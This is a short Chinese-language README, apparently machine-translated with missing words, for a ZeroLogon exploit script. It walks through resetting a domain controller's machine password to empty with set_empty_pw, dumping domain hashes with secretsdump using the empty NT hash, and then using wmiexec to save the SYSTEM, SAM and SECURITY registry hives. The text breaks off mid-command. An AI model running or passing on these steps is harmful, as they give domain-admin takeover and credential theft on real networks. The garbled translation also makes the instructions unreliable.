ZeroLogon开发脚本
利用基于和代码。 Secura的原始研究和扫描仪,RiskSense Inc.的修改。
要利用该漏洞,请清除您以前安装的所有Impacket,然后从或更高版本安装Impacket。 然后做:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
如果成功的话,您将能够:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
这应该使您成为域管理员。 完成后,使用来自secretsdump的凭据将wmiexec.py转到目标DC并执行
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SE
